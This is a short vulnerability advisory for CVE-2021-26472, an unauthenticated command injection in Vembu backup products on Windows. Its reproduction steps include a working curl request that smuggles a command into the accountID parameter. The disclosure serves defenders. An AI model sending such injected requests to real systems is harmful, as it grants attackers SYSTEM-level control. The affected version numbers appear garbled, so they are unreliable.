CVE-2021-26472 - Unauthenticated remote command execution with SYSTEM privileges in Vembu products
|Page author||Frank Breedijk|
|CVSS||Base score: 10|
|Last modified||20 Jun 2022 09:35|
In VembuBDR before 18.104.22.168 and VembuOffsiteDR before 22.214.171.124 installed on Windows, the http API located at /consumerweb/secure/download.php. Using this command argument an unauthenticated attacker can execute arbitrary OS commands with SYSTEM privileges.
How to reproduce
Step 1: Install a vulnerable product on Windows
Step 2: execute the following http request
$ curl 'http://local/consumerweb/secure/download.php?Action=ResellerTemplate&accountID=%26whoami'
Step 3: Result
This vulnerability allows an attacker to execute arbitrary windows commands with full system privileges. A.k.a. a full system compromise.